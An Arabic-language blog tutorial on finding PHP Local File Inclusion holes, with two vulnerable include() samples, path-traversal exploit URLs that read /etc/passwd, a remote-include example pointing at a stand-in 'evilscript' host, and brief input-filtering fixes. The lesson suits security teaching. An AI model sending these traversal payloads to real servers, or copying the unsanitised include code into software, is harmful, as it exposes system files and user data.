A Study in PHP Vulnerabilities - LFI

بسم الله الرحمن الرحيم

اللهم صل وسلم على سيدنا محمد وعلى آله وصحبه اجمعين

اللهم علمنا ماينفعنا وانفعنا بما علمتنا انك انت العليم الحكيم

اليوم نبدا باذن الله في الدرس الثاني من اكتشاف الثغرات

واليوم معنا

#Local File Inclusion


الدوال المسببة للنوع هذا من الثغرات هي نفسها الدوال المسببة لثغرات RFI وهي 

1.include.
2.include_once.
3.require.
4.require_once.

الان بعد ماعرفنا الدوال المسببة للثغرة احب انوّه على شيئين في النوع هذا من الثغرات 

نقدر نستخدم ? وnullbyt مثل ثغرات RFI وايضا 

#-../ 
تعني التحرك بمقدار مجلد واحد للاعلى وهذا في انظمة اللينكس 

وفي انظمة الوندوز تكون بالعكس 

#-..\

 الان بعد ماوضحنا النقطتين هذه ناخذ امثلة عشان توضح الصورة عندنا 
  
            <?php
            $0w4y=$_GET['0w4y'];
            include '/0w4y/'.$0w4y;
            ?>
 الان في الكود السابق مانقدر نسوي انكلود لاي ملف خارجي لان المجلد الموجود هو '/0w4y/' حتى لو جربنا نستغل الكود بالطريقة التالية 

 http://localhost/one.php?0w4y=http://evilscript/evil.php

راح يتغير ليصبح 

http://localhost/one.php?0w4y=/0w4y/http://evilscript/evil.php


في الحالة ذي لا يوجد لنا خيار سوا استدعاء ملف داخلي في السيرفر 

طريقة الاستغلال 
http://127.0.0.1/test.php?0w4y=../../../../../../etc/passwd 

وفي الكود راح يكون الانكلود بالشكل التالي 

/0w4y/../../../../../../etc/passwd

 يعني اول شي مجلد 0w4y اللي في نفس الكود بعدين تحركنا بمقدار 6 مجلدات لنوصل للملف passwd 

كود ثاني لتوضح الصورة وهذا الكود كان منشور في سكربت في مجلد install/install.php

           if(empty($_GET["url"]))
           $url = 'step_welcome.php';
           else
           $url = $_GET["url"];
           .............etc.............
           <p><? include('step/'.$url) ?></p>


الاستغلال راح يكون 

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd 

طريقة اصلاح الثغرة .
 عدم السماح باستخدام special chars .
طريقة اخرى .

فلترة المتغيرات مثل "." , "/" , "\"


الى هنا ينتهي الدرس والقاكم في دروس اخرى باذن الله 

اذا اعجبتك فاذكر الله وادعل لي وان لم اعجبك فانتقدني لاصبح افضل 

  

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

Html code injection-[Post-Get-StoredData!]-

صورة
السلام عليكم ورحمة الله وبركاتة،    بسم الله الرحمن الرحيم والصلاة والسلام على أشرف الخلق والمرسلين ، اليوم شرحنا راح نتكلم عن ثغرات HTML INJECTION وذلك عن طريق حقن كود HTML بالمدخل او المتغير المصاب ومحاولة استغلالها بعده طرق,  بالاول ناخذ تعريف عن   [ HTML = [ HyperText Markup Language تعني لغة توصيف النص التشعبي: wikipedia   بالعادة لغة توصيف النص التشعبي تكون بالدرجة الاولى في تصميم وتوظيف قوالب والنصوص. في الويب ابلكيشن وهاذا شيء طبيعي جدا. ولكن تكمن ثغراتها في تحقق المدخلاات مثلها مثل اي ثغرة اخرى في الويب ابلكيشن. اي  لنفرض بأن لدي صفحه في موقع معين مبني على HyperText Markup Language   بالكامل ولديه مدخل بأسم [" Search "] وليس عليه تحقيق او فلتره للمدخل في هالحاله تكمن الاصابة، ولكن تختلف المعاير في طريقة الارسال والاستقبال الحزم. وعندما اعني تختلف في الارسال اي اعني في الطلب والاستقبال من خلال طرق الارسال Hypertext ] Transfer Protocol ]= Http. وكما تسمى Http Method&*Http Verbs/ وهي في الغالب تكون مابين اثنين اكثر ان...
قراءة المزيد

CRLF injection [\r\n Carriage Return]

صورة
السلام عليكم ورحمة الله وبركاتة , .  في البداية ناخذ تعريف عن معنى CRLF CRLF   CR=Carriage Return   %0d 0x0D \r LF=Line feed 0x0A %0a \n ماهو crlf عندما يقوم شخص بارسال طلب من المتصفح الى السيرفر  السيرفر راح يرد بالريسبونس يحتوي على  http response headers content Carriage Return Line feed تستخدم في ملاحظه انتهاء الاين او السطر و كما نلاحظ طريقه الفصل بين Header مع الContent Carriage Return&line feed لكن تختلف من ويندوز الى لينكس  حيث الويندوز يتطلب  بانتهى السطر با crlf في بروتوكول http/https اما في لينكس  line feed  lf يتطلب  فقط في بروتوكول الhttp  اين تكمن الثغرة: الثغرة تكمن عندما يضع المبرمج مدخل يستطيع المخترق او المستخدم بالتحكم في response header مثال من بعض الامثله التحكم في الوق مثلا الان وقت الاسغلال والتصعيد من بعض خطورة crlf ممكن التصعيد الى xss ,Session Fixation,openredirect ايضا ممكن rce على حسب المحتوى من خطوره crsf م...
قراءة المزيد